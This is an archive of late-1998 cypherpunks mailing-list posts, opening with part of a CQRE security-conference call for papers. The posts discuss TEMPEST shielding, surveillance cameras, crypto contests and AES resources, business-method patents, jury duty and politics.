WEB SITE:
--------------------------------------
Up to date information about CQRE [Secure] Exhibition & Congress
will be available at http://www.secunet.de/Forum/cqre.html

IMPORTANT DATES:
--------------------------------------
- Deadline for submission of extended abstracts	               May 14,
1999
- Deadline for submission of panel proposals                      June
1,  1999
- Notification of acceptance
June 25, 1999
- Deadline for submission of complete papers                    July 30,
1999

PROGRAM COMMITTEE:
--------------------------------------
Johannes Buchmann                 (TU Darmstadt) 
Dirk Fox                                   (Secorvo) 
Walter Fumy                             (Siemens) 
Rdiger Grimm                          (GMD) 
Helena Handschuh                    (ENST/Gemplus)
Thomas Hoeren                         (Uni Muenster) 
Pil Joong Lee                            (POSTECH) 
Alfred Menezes                         (U.of Waterloo / Certicom) 
David Naccache                        (Gemplus) 
Clifford Neumann                       (USC) 
Mike Reiter                               (Bell Labs) 
Matt Robshaw                           (RSA) 
Richard Schlechter                    (EU-comm.)
Bruce Schneier                         (Counterpane) 
Tsuyoshi Takagi                        (NTT) 
Yiannis Tsiounis                        (GTE Labs) 
Michael Waidner                       (IBM) 
Moti Yung                                (CERTCO) 
Robert Zuccherato 		(Entrust)

PROGRAM CHAIR: 
--------------------------------------
Rainer Baumgart 
secunet Security Networks GmbH
Weidenauer Str. 223 - 225 
57076 Siegen Germany 
Tel.: +49-271-48950-15 
Fax: +49-271-48950-50 
R.Baumgart@secunet.de





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Thu, 24 Dec 1998 09:03:19 +0800
To: Frederick Burroughs <cypherpunks@ns.minder.net>
Subject: Re: Question about 'TEMPEST': UPS
In-Reply-To: <199812232032.OAA03464@manifold.algebra.com>
Message-ID: <3.0.5.32.19981223163005.0082ed70@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 05:21 PM 12/23/98 -0500, Frederick Burroughs wrote:
>Igor Chudov @ home wrote:
>>  Now... Just curious, if I simply make my study into a faraday cage via
>> use of fine (< 1/2 inch) chicken wire, and insulate my power system from
>> the computer emenations, would that be enough? Chicken wire is not that
>> expensive, and I think that I could make it look nice on walls.
>
>How effective is aluminum foil (crinkled and layered)? It's cheap, easy to install
>and remove, and in concert with some halogen lighting, be host to any number of
>suspicious activities.

Neither one will make a dent from a Tempest perspective,
though the foil might disperse heat enough to protect your dope farm :-)
Bettter to build an RF-tight box for your PC and use fiber cables,
and you'll still need to do really special power filtering.

The Army used to use copper screen cages for computers back in the 70s,
which got about 60dB worth of shielding.  When I ran a TEMPEST-shielded
room in the mid-80s, the specs said (roughly) that you needed 100dB
of shielding for a room with computers in it, and the room technology
we used gave about 110-120dB depending on how tight our door gaskets were.
It used particle board with sheet metal on both sides and special
edge/corner joints, and you packed copper-wool into any loose area
and copper tape on any flat areas that had leaks.  

At the time you needed to be very careful about joints between anything,
because RF just _leaks_, and we watched frequencies up to about 450MHz,
since then-current computer equipment didn't have harmonics at
anything like that high a frequency - but it still didn't take much
of a leak to peg the meters, in spite of that being a .6 meter wavelength.
Well, 1.5MIPS Vaxen are a bit out of date now, 300MHz Pentiums are common,
and they've got all sorts of harmonics out there.
If you want a penetration in the walls, e.g. for air or fiber optic cables,
you needed some ratio I've forgotten between the depth and width of the hole;
A two-inch deep hole could be about 1/4" across -- your 1/2" flat chickenwire
would be pretty transparent.

There's newer stuff now - some kind of carbon-fiber cloth with aluminum in it
that's really nice to wallpaper with, but you still need to handle
all the joints, which is tough to do.


Other than protecting your dope farm, tin foil's not real useful,
though I suppose you could line your hat with it to keep microwaves out :-)
What's scary is that I _have_ seen a catalog (mostly NewAgey health scams)
that sold RF-shielded hats; I forget if they were metal-lined or carbon-fiber.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Thu, 24 Dec 1998 07:28:19 +0800
To: Sunder <sunder@brainlink.com>
Subject: Re: mobil cctv cameras... sigh...
In-Reply-To: <368168F2.66280E32@brainlink.com>
Message-ID: <199812232138.QAA011.83@whgiii>
MIME-Version: 1.0
Content-Type: text/plain



In <368168F2.66280E32@brainlink.com>, on 12/23/98 
   at 05:04 PM, Sunder <sunder@brainlink.com> said:

>The PATROL CCTV Called MOBILE VISION, is a
>mobile surveillance system, which extends the
>visual perimeter for Law Enforcement, Military,
>Government mobile surveillance requirements and
>for both on and off road driving for SUV
>enthusiasts. A Pan/Tilt/Zoom is compatible with
>in-car video recorders. 

>Stabilizes images, reads license plates at 300FT.
>With a 24X Zoom and 85,000:1 dynamic range
>camera, makes Mobile Vision a unique system. "

All circumvented with a handful of mud. Isn't technology grand. :)

-- 
---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
---------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Thu, 24 Dec 1998 06:20:39 +0800
To: ray@sunder.net
Subject: Roast pesky car theives with a flame thrower!
Message-ID: <368166A6.D950FE25@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



http://www.cnn.com/WORLD/africa/9812/11/flame.thrower.car/

Don't you wish these were legal in the USA? :)


-- 
----------------------------  Kaos Keraunos Kybernetos  -------------------
 + ^ +        Sunder          "The   real aim  of current policy is to /|\
  \|/    sunder@sunder.net    ensure the continued effectiveness of   /\|/\
<--*--> ALLOW FREE EXPORT OF  US information warfare assets against   \/|\/
  /|\   STRONG CRYPTOGRAPHY!  individuals,businesses and governments   \|/
 + v +  PROTEST WASSENAAR!!!  in Europe and elsewhere"  -- Ross Anderson
------------------------------ http://www.sunder.net ----------------------

RESTRICTED DATA - This material contains RESTRICTED DATA as defined in
the Atomic Energy Act of 1954. Unauthorized disclosure subject to 
administrative and criminal sanctions.  NOFORN ORCON WNINTEL SIOP-ESI CNWDI




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Thu, 24 Dec 1998 06:35:19 +0800
To: cypherpunks@cyberpass.net
Subject: mobil cctv cameras... sigh...
Message-ID: <368168F2.66280E32@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



http://www.patrolcctv.com/

"PATROL CCTV:

The PATROL CCTV Called MOBILE VISION, is a
mobile surveillance system, which extends the
visual perimeter for Law Enforcement, Military,
Government mobile surveillance requirements and
for both on and off road driving for SUV
enthusiasts. A Pan/Tilt/Zoom is compatible with
in-car video recorders. 

Stabilizes images, reads license plates at 300FT.
With a 24X Zoom and 85,000:1 dynamic range
camera, makes Mobile Vision a unique system. "


-- 
----------------------------  Kaos Keraunos Kybernetos  -------------------
 + ^ +        Sunder          "The   real aim  of current policy is to /|\
  \|/    sunder@sunder.net    ensure the continued effectiveness of   /\|/\
<--*--> ALLOW FREE EXPORT OF  US information warfare assets against   \/|\/
  /|\   STRONG CRYPTOGRAPHY!  individuals,businesses and governments   \|/
 + v +  PROTEST WASSENAAR!!!  in Europe and elsewhere"  -- Ross Anderson
------------------------------ http://www.sunder.net ----------------------

RESTRICTED DATA - This material contains RESTRICTED DATA as defined in
the Atomic Energy Act of 1954. Unauthorized disclosure subject to 
administrative and criminal sanctions.  NOFORN ORCON WNINTEL SIOP-ESI CNWDI




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 24 Dec 1998 07:17:25 +0800
To: cryptography@c2.net
Subject: http://walkerdigital.com/html/patents.html
Message-ID: <v04020a1ab2a7096605d1@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Walker Digital, a self-described "Edison in Menlo Park" knockoff, and
propagator of the priceline.com business model patent (which see, above), is
the feature article of this week's omi-1998-gawd issue of The Industry
Standard.


WD has been patenting everything it can think of, including something I heard
of at least 3 years ago from Eric Hughes and Bob Hilby at Simple Access:
accumulating internet purchases to a 900- telephone number bill. However,
since WD is 5 years old, maybe they got there first after after all, and
that's why Hilby, Hughes and Co., stopped talking about it. Either that or
Eric got Yet Another Big Idea, and they went chasing down *that* rabbithole
instead. As a mostly unmedicated ADDer, I can sympathize with that problem,
myself :-)...


Anyway, since business process patents are the subject of this month's DCSB
meeting, with what I'm sure will be a great talk by Michael Schmelzer and Ira
Heffan of Testa Hurwitz here in Boston, I figured I'd give everyone on these
lists some food for beforehand. People should monitor
<http://www.thestandard.com>, for the actual text of the article, if and when
it eventually hits their archives. It'll probably take a week or so.

If, of course, they don't have a copy of the magazine themselves already, that
is.


William Braddock, who's the chairman and CEO of Priceline now, used to be up
my direct chain of command, three or four bosses up, when I was an operations
analyst at Citicorp 10 years ago, though I never met him.  Eventually, he
ended up President and CEO of Citicorp after I left.

The guys I worked for always used to talk about him reverentually, but that
could just be an organization-man thing. I seem to remember Steve Schear, who
used to work at a different Citicorp company back then, talking lately about
Braddock once or twice, but I can't remember if Schear knew Braddock back then
or not.


Finally, and most important for us, it looks like Bruce Schnier's involved
with Walker Digital as a partner.

Given the cryptographic content of not a few of their patents, (like
5,828,751, "Method for Secure Measurement Certification", or  5,768,832,
"Remote-Auditing of Computer-Generated Outcomes and Authenticated Billing and
Access-Control System Using Cryptographic and Other Protocols") it looks like
that's where he's parking some of his IP these days. But, of course, I haven't
gone to look at the patents themselves to see if his name's on them, so that's
only speculation.

Curioser and curioser.


Reading all of this stuff this afternoon me made me antsy enough, grouchy,
really, to start a rant about this kind of patent-farming, sparked both by all
the registered trademarks in the DigiCash bankruptcy filing, and compounded
all the fun things Walker Digital has gone and patented, things which are
braindead simple. To some people, anyway. :-).

Priceline, for instance, seems to me exactly like the specialist's book at the
New York Stock Exchange, frankly, but since it's now on the internet, it's
patentable, according to the Patent Office.


Anyway, the rant on this is forthcoming, or at least in the hopper, my having
vented a little steam here, and, in the meantime, I thought I'd fire off this
heads-up to everyone so they can read the Industry Standard article
themselves. It's on Page 60 of the December 28 / January 4 issue.

And, tangentally, to plug January 5th's DCSB meeting, of course, :-), which
should be a really good one, in light of current events.


Cheers,
Robert Hettinga

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.5.5

iQEVAwUBNoFsicUCGwxmWcHhAQFQzQgAmVZDbchvpnDb5/ofq9OKGu5yqD9YMnyf
I0H75rjorm/k9TNSC8kH1yvp8s0n6eaXh0r7Bf0CayYeAKg+4tZHHjysHKxKowwR
Xjcmm8ACwNLTlQTF1GWpaUoSE5RQ3cDZJKJGHA3OQRRewJlC7D/Zz48pZfP7EXuB
ASDOC+f+aDjAYFa66d8ax1a49SbKC4Xpr0blpxp9uCU7aUdgJp51H25jiZvE/Wi3
NvgxDZzw1me6LToSPZR+qa7rmExlEyFJsDmhYkhHh7PH8qOR4gwGXD9ZunpPlm6U
buW99TtKNzM32os0Pdbod9AcuifOS+s1f5ubJxJ5i21RmeeOPEtiig==
=wb+S
-----END PGP SIGNATURE-----
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frederick Burroughs <riburr@shentel.net>
Date: Thu, 24 Dec 1998 06:45:57 +0800
To: Cypherpunks <cypherpunks@ns.minder.net>
Subject: Re: Question about 'TEMPEST': UPS
In-Reply-To: <199812232032.OAA03464@manifold.algebra.com>
Message-ID: <36816CF1.F1F7CE34@shentel.net>
MIME-Version: 1.0
Content-Type: text/plain





Igor Chudov @ home wrote:

>  Now... Just curious, if I simply make my study into a faraday cage via
> use of fine (< 1/2 inch) chicken wire, and insulate my power system from
> the computer emenations, would that be enough? Chicken wire is not that
> expensive, and I think that I could make it look nice on walls.

How effective is aluminum foil (crinkled and layered)? It's cheap, easy to install
and remove, and in concert with some halogen lighting, be host to any number of
suspicious activities.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Thu, 24 Dec 1998 09:49:40 +0800
To: Igor Chudov <ichudov@Algebra.COM>
Subject: Re: Question about 'TEMPEST': UPS
In-Reply-To: <199812240040.SAA07841@manifold.algebra.com>
Message-ID: <36819772.503@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



Igor,

These were commercial cages used in the consumer products design
business. Things like radios, TVs, 900MHz cordless phones etc...do I
know for a fact that two or three layers of fine mesh copper ( BTW about
an inch apart ) were necessary? No. I just took the word of the guys who
had been doing the stuff for years. It wouldn't surprise me if the
commercial cages were overkill. Neither would I be surprised if anything
less leaked significantly. RFI is not an easy subject area. Find a
commercial cage vendor and talk to an apps eng.

Lacking an actual test facility, I suppose a really basic test would be
to use a hand-held AM radio tuned to a space between stations and try
out your PC with and without a chicken-wire cage. Sometimes a particular
piece of SW will have a pattern that you can recognize, maybe following
a keypress. I've been able to differentiate between button scan,
watchdog, servos, processor etc... It's a relatively cheap, quick
experiment. Try different frequencies and orientations of the ferrite
loop antenna. For higher frequencies ( CPU clocks + other harmonics )
you'll need other methods. I've been meaning to take a look at a
standard PC keyboard. Someday soon...if I do I'll let you know what I
find.

As for looks - tough - a PC generates lots of RFI, a partially
functional cage is probably worse than none at all because of the false
sense of security.

Trying to shield the computer and the monitor is an entirely different
can of worms. Probably an order of magnitude harder than making a good
cage.

Regards,
Mike

In real life even the easy things are not easy.

Igor Chudov @ home wrote:
> 
> Michael Motyka wrote:
> >
> >
> > >
> > Now... Just curious, if I simply make my study into a faraday cage via
> > use of fine (< 1/2 inch) chicken wire, and insulate my power system from
> > the computer emenations, would that be enough? Chicken wire is not that
> > expensive, and I think that I could make it look nice on walls.
> > >
> >
> > The cages I've used were framed in wood and had several layers of copper
> > screening. The mesh was like standard window screen, <.125". There were
> > two, I think sometimes three, layers. The corners/joints were copper
> 
> Michael,
> 
> Was the amount of work involved really necessary? What do three layers
> accomplish compared to just one?
> 
> > sheet. The screen was soldered to the corners. The doors were stepped or
> > beveled and had several sets of fingers - indside edge, outside edge,
> > perhaps one intermediate. Screen makes ventilation easier. Power should
> > be brought in through a separate, partitioned, shielded box with
> > filtering in each partition. Phone lines, same thing. You trust your
> > apps, os and TCP/IP stack to not rat you out? If not, work off-line
> > always.
> 
> Right.
> 
> > Al foil if it were thick enough would be OK but how do you reliably join
> > edges?
> 
> Glue? Perhaps some weak glue that would not destroy the underlying paint.
> 
> > Converting your study is non-trivial. The door would look like crap. You
> > would need the euivalent of a door over the window.
> 
> My window has a mesh on it. Is that not enough?
> 
> > I wouldn't trust 1/2" galvanized chicken wire for containing anything
> > but chickens or other non-gnawing furry woodland creatures.
> 
> Is that confirmed by evidence?
> 
> The reason for my question, I think that I somewhat value TEMPEST
> protection, but not enough as to cover my whole room with expensive and
> ugly looking copper or three layers of mesh and ferrite. I don't want
> all of it to be too conspicious.
> 
>         - Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 24 Dec 1998 08:01:01 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Break the code...from RSA [CNN]
Message-ID: <199812232356.RAA12783@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://www.cnn.com/TECH/computing/9812/23/codecrack.idg/

>                        RSA WANTS YOU TO CRACK THIS CODE
>                                        
>     [INLINE]
>    
>    December 23, 1998
>    Web posted at: 10:30 AM EST
>    
>    by Rebecca Sykes
>    
>    (IDG) -- RSA Data Security will host another contest to break the U.S.
>    government's Data Encryption Standard at the RSA Data Security
>    Conference in San Jose, Calif., in January.
>    
>    The 56-bit DES encryption algorithm is widely used and has been broken
>    in the contest before, most recently in July in a record three days.

[text deleted]


    ____________________________________________________________________

          What raises the standard of living may well diminish the
          quality of life.

                                                 The Club of Rome

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul H. Merrill" <PaulMerrill@acm.org>
Date: Thu, 24 Dec 1998 07:40:54 +0800
To: "Brown, R Ken" <brownrk1@texaco.com>
Subject: Re: Question about 'TEMPEST'
In-Reply-To: <896C7C3540C3D111AB9F00805FA78CE20313FB44@MSX11002>
Message-ID: <36817918.68EF807C@ACM.Org>
MIME-Version: 1.0
Content-Type: text/plain



The details of TEMPEST are classified, but details of reduction of
emmissions are not.  After all, those little FCC notices on your
equipment these days are regarding emmissions.  'Tis all a matter of
degree.

PHM 

Brown, R Ken wrote:
> 
> Tim May wrote:
> 
> > The full TEMPEST specs are more or less classified, as might
> > be expected. (Because one does not lightly tell one's enemies
> >  what one is measuring for.)
> 
> > Contrary to popular rumor, it is not "illegal" to shield
> >  computers, to "use TEMPEST methods," as it were.
> 
> Rather hard to see how it could be, given that the details are supposed to
> be secret!  If all of a sudden you got arrested for wrapping wet towels
> around screens that would be a Big Clue....
> 
> (of course that assumes you live in a country where you get told what you;ve
> been arrested for. Hmmmm....)
> 
> Ken




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Thu, 24 Dec 1998 09:08:47 +0800
To: mmotyka@lsil.com
Subject: Re: Question about 'TEMPEST': UPS
In-Reply-To: <3681858B.4028@lsil.com>
Message-ID: <199812240040.SAA07841@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Michael Motyka wrote:
> 
> 
> >
> Now... Just curious, if I simply make my study into a faraday cage via
> use of fine (< 1/2 inch) chicken wire, and insulate my power system from
> the computer emenations, would that be enough? Chicken wire is not that
> expensive, and I think that I could make it look nice on walls.
> >
> 
> The cages I've used were framed in wood and had several layers of copper
> screening. The mesh was like standard window screen, <.125". There were
> two, I think sometimes three, layers. The corners/joints were copper

Michael,

Was the amount of work involved really necessary? What do three layers
accomplish compared to just one?

> sheet. The screen was soldered to the corners. The doors were stepped or
> beveled and had several sets of fingers - indside edge, outside edge,
> perhaps one intermediate. Screen makes ventilation easier. Power should
> be brought in through a separate, partitioned, shielded box with
> filtering in each partition. Phone lines, same thing. You trust your
> apps, os and TCP/IP stack to not rat you out? If not, work off-line
> always.

Right.

> Al foil if it were thick enough would be OK but how do you reliably join
> edges? 

Glue? Perhaps some weak glue that would not destroy the underlying paint.

> Converting your study is non-trivial. The door would look like crap. You
> would need the euivalent of a door over the window.

My window has a mesh on it. Is that not enough?

> I wouldn't trust 1/2" galvanized chicken wire for containing anything
> but chickens or other non-gnawing furry woodland creatures.

Is that confirmed by evidence?

The reason for my question, I think that I somewhat value TEMPEST
protection, but not enough as to cover my whole room with expensive and
ugly looking copper or three layers of mesh and ferrite. I don't want
all of it to be too conspicious.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 24 Dec 1998 09:55:50 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Question about 'TEMPEST': UPS (fwd)
Message-ID: <199812240152.TAA13324@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 23 Dec 1998 17:22:58 -0800
> From: Michael Motyka <mmotyka@lsil.com>
> Subject: Re: Question about 'TEMPEST': UPS

> These were commercial cages used in the consumer products design

Someplace you might want to check into about actual real-world cage design
and computers is Cray.

When I worked at UT Austin and we put in the comp center at the Balconese
Research Center it had a wire mesh cage installed per spec by Cray for the
X-MP & Y-MP.

It would not surprise me if they didn't have some literture and design
guides available.


    ____________________________________________________________________

          What raises the standard of living may well diminish the
          quality of life.

                                                 The Club of Rome

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Alten <Alten@home.com>
Date: Thu, 24 Dec 1998 13:21:33 +0800
To: Dave Del Torto <ukcrypto@maillist.ox.ac.uk
Subject: Re: mysterious PGP release-signing keys
In-Reply-To: <v04103b00b2a2b76183d0@[192.168.248.7]>
Message-ID: <3.0.3.32.19981223195440.00b29970@mail>
MIME-Version: 1.0
Content-Type: text/plain



>Please excuse the crosspost, but does anyone know *who* generated and/or
>owns these keys?
>

This is yet another a good example of why one should never confuse using PK 
certificates with security.  An email PGP signature looks impressive but in
practice it is useless.

- Alex

--

Alex Alten

Alten@Home.Com
Alten@TriStrata.Com

P.O. Box 11406
Pleasanton, CA  94588  USA
(925) 417-0159




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 24 Dec 1998 03:56:02 +0800
To: jim_finder@hotmail.com
Subject: Re: Good archive of AES algorithms?
Message-ID: <199812231930.UAA06278@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



> Thanks to everyone who responded to me on the AES
> archive. Most people pointed me to the counterpane.com
> web site, which is very nice and well done, and answers
> most of my questions. Unfortunately, though, Counterpane
> itself is one of the candidates, so the site may not
> exactly be unbiased. Is there any site with a similar scope
> being run by a disinterested party?

Apparently you did not see the post which directed you to
http://www.nist.gov/aes/.  This is the home page for the AES.  It has
links to independent analyses of the algorithms, as well as performance
information.  From that page we find:

Block Cipher Lounge
        http://www.ii.uib.no/~larsr/aes.html
cAESar Project
        http://www.dice.ucl.ac.be/crypto/CAESAR/caesar.html
Efficiency Testing Table
        http://home.cyber.ee/helger/aes
Efficiency Testing Results
        http://www.seven77.demon.co.uk/aes.htm
Analysis from Louis Granboulan
        http://www.dmi.ens.fr/~granboul/recherche/AES.html
NIST's preliminary efficiency testing results
        http://csrc.nist.gov/encryption/aes/round1/nistefficiency1.pdf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 24 Dec 1998 03:56:16 +0800
To: cypherpunks@Algebra.COM
Subject: jury duty
Message-ID: <199812231931.UAA06366@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 08:30 AM 12/23/98 +0100, Anonymous wrote:
>In 22 years of being qualified, I am facing my first jury duty summons as
a regular employee and see no way out except to report. The old
self-employment, financial burden exemption no longer applies.

Your employer is not obligated to pay you during your arbitrarily-long
court slavery, BTW.

See: Fully Informed Jury Amendment 
	www.fija.org

Since snailmail is datagrams, how do they know you received their packet?

Remember that you aren't obligated to explain your reasons any more
than the barbarians are obligated to be reasonable.

>If no answers, I will resort to a search engine. But I thought this letter
would get me better
>quality advice.

I wonder if its a crime yet to refer you to FIJA.  You can get
busted in Calif for distributing FIJA materials near a court.

Don't stand out and you can accomplish more subversion.








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 24 Dec 1998 04:07:42 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Jury Duty
Message-ID: <199812231944.UAA07759@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 23 Dec 1998, Anonymous wrote:

> In 22 years of being qualified, I am facing my first jury duty summons as a regular employee and see no way out except to report. The old self-employment, financial burden exemption no longer applies.
> 
> Is there a good web site where I can find other legal means to recuse myself (I live in AZ), or if I do
> decide to report and get on a trial, a web site on my rights to vote my conscious, aka jury nullification?

Tell them the following:

"I am aware of the doctrine of jury nullification and I will inform my
 fellow jurors of it.  I will invoke it in cases where the defendant
 has been charged with a victimless crime, i.e. drug-related offenses,
 statutory rape, or other thoughtcrime, or when the law is otherwise
 unjust or unreasonable."

The prosecutor won't touch you with a 10 foot pole.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 24 Dec 1998 04:38:13 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: DOES U.S. INTERVENTION OVERSEAS BREED TERRORISM?
Message-ID: <199812231958.UAA08914@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



<snip from http://www.cato.org/pubs/fpbriefs/fpb-050es.html>

Executive Summary 

According to Secretary of State Madeleine Albright, terrorism is the most
important threat the United States and the world face as the 21st century
begins. High-level U.S. officials have  acknowledged that terrorists are now
more likely to be able to obtain and use nuclear, chemical, and biological
weapons than ever before. 

Yet most attention has been focused on combating terrorism by deterring and
disrupting it beforehand and retaliating against it after the fact. Less
attention has been paid to what motivates terrorists to launch attacks.
According to the Pentagon's Defense Science Board, a strong correlation
exists between U.S. involvement in international situations and an increase
in terrorist attacks against the United States. President Clinton has also
acknowledged that link. The board, however, has provided no empirical data
to support its conclusion. This paper fills that gap by citing many examples
of terrorist attacks on the United States in retaliation for U.S.
intervention overseas.  The numerous incidents cataloged suggest that the
United States could reduce the chances of such devastating--and potentially
catastrophic--terrorist attacks by adopting a policy of military restraint
overseas. 
<snop>
<snip>
In fact, the interventionist foreign policy currently pursued by the United
States is an aberration in its history. Adopting a policy of military
restraint would return the United States to the traditional foreign policy
it pursued for the first century and a half of its existence before the Cold
War distorted it. Such a foreign policy is more compatible with the
individual freedoms and economic prosperity that define the American way of
life.
<snop>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevlar <webmaster@max-web.com>
Date: Thu, 24 Dec 1998 13:58:29 +0800
To: ichudov@Algebra.COM (Igor Chudov)
Subject: Re: Question about 'TEMPEST': UPS
In-Reply-To: <Pine.LNX.3.96.981223003628.24980B-100000@albert>
Message-ID: <3.0.6.32.19981223213018.00989c20@max-web.com>
MIME-Version: 1.0
Content-Type: text/plain



At 09:39 AM 12/23/98 -0600, you wrote:
>Just curious, if a computer is connected to the electric power through a UPS,
>does that reduce emissions leaked into the electrical system?:wq
>

While I can't anwser that question, I do know of a technique where you look
at the rises and falls in resistance on an ic (like a cpu, or other
microprosser) and be able to tell what instructions were being executed.
The problem was that you needed to

A) Know what instructions were being executed so you could assign them to
different patterns (calibrate first).

B) Do A every time you switch ic's. (recalibrate every time you change ic's)

Of corse you need a clean power supply to begin with, and some way to
measure nearly imperceptable changes in resistance.

There once was a file I read on "Real Programmers (substutite with any
computer profession).
This is from my memory so don't quote me:
"
Real Programmers don't eat quiche.
They eat microwave popcorn.

Real Programmers don't pop their microwave popcorn in microwaves.
They use the heat of the cpu.

Real Programmers don't use Gate Emulators.
They can tell what instruction is being executed at any given time by the
rate of the popcorn popping.
"

I thought it was appropiate.

-Kevlar
<Webmaster@max-web.com>

Does God know Peano Algebra? Or does she not care if strong atheists
couldnt reason their way out of a trap made of Boolean presumptions?

A little bit of knowledge is a dangerous thing, but zero knowlege is
absolutely subversive.

Overspecialization breeds in weakness. It's a slow death.

Beat your algorithms into swords, your dumb terminals into shields, and
turn virtual machines into battlefields... Let the weak say, "I am strong"
and question authority. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 24 Dec 1998 11:42:17 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Expansion of handgun bans? [CNN]
Message-ID: <199812240339.VAA13582@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> X-within-URL: http://www.cnn.com/US/9812/23/gun.study/

>    
>                    EXPAND THE HANDGUN BAN? STUDY DRAWS FIRE
>                                        
>    guns December 23, 1998
>    Web posted at: 4:28 p.m. EST (2128 GMT)
>    
>     In this story:
>      * Misdemeanor convictions linked to future crimes
>      * Critic: Study flawed
>      * Related stories and sites
>        
>    
>    
>    CHICAGO (CNN) -- It's legal in the United States for a person
>    convicted of a misdemeanor to buy a handgun. But, according to a study
>    being challenged as flawed, such purchasers are more likely than those
>    without a criminal record to commit a crime and should be barred from
>    buying handguns, just as felons are.
>    
>    The study was published Wednesday in the Journal of the American
>    Medical Association.

[text deleted]


    ____________________________________________________________________

          What raises the standard of living may well diminish the
          quality of life.

                                                 The Club of Rome

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 24 Dec 1998 11:33:47 +0800
To: cypherpunks@cyberpass.net
Subject: Re: http://walkerdigital.com/html/patents.html
Message-ID: <v04020a23b2a75a1f031b@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date: Wed, 23 Dec 1998 15:18:40 -0800 (PST)
From: <Somebody (who founded a software company :-))>
To: rah@shipwright.com
Subject: Re: http://walkerdigital.com/html/patents.html
Status: U

IMHO, the patent office has no clue what the hell they're doing.  Maybe
it is time we do away with patents and let people who feel ripped off rely
the courts for restitution.

I have always thought that patents were to protect the inventor from
being ripped off.  However, i now find that:

1. patents are slowing down progress, since someone with a better idea
can't use that idea since somehow, any incarnation of the patented idea,
however different it may be, is covered by the broadness of the patent,
